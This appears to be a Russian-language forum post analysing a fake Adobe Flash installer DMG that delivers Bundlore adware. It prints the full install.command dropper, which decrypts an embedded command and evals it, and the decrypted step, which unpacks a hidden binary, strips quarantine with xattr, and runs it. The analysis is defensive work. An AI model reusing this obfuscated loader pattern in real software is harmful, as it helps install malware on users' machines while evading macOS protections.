Я нашел похожий файл DMG на компьютере клиента для поддельного установщика Adobe Fla sh. DMG монтируется как: Install
.
Вот список файлов:
./.hidden
./.hidden/HLJmbHkfitABiHhn
./.hidden/install.command
./.xpXAWXkM.png
./Install
Install.command
содержит следующее:
#!/bin/bash
export appDir=$(cd $(dirname "$0"); pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX18lOdkLzSozhmQGEu7a8leGWy6jXW+BllZXUi1W/XnAEKBrL+EM1wsawN6qJDJMNcpDsivBE/qDTo+KEceFM+Nre/iI0wYp0PrayPcp3ZqWHk08tu5PUtbu86Q/GnAtxxpdbDf4/c6ZeMNsEIS/X/uBB3SwqZA0t6+UrqlZhxwcluRVLaLUe6agBYVdP3okkrhjPaOnkz/aI0boFmvWqcc0yVA4GdGobookmiXFhiINCDjiQlt3zFPGfhVLmG3R/p5ACeYwob2D+BX7qn6Z2r0t4psAFpXnx8Ch/QZPAjM3cq7NfmbDk7Wy'
decryptedCommand="$(echo -e "$commandArgs" | openssl enc -aes-256-cbc -d -A -base64 -pass "pass:$archive")"
nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 &
killall Terminal
Из скрипта , HLJmbHkfitABiHhn
- ключ дешифрования. Таким образом, decryptedCommand
- это (после расшифровки):
$(echo "openssl enc -aes-256-cbc -d -A -base64 -k \"$archive\" -in \"$appDir/$archive\" -out \"$tmpDir/$binFile\"; xattr -c \"$tmpDir/\"*; chmod 777 \"$tmpDir/$binFile\"; \"$tmpDir/$binFile\" && rm -rf $tmpDir")
Выше просто расшифровывает ./.hidden/HLJmbHkfitABiHhn
в двоичный файл, чтобы запустить его, используя HLJmbHkfitABiHhn
(снова) в качестве ключа.
Этот бинарный файл - Bundlore Malware. См. Отчет VirusTotal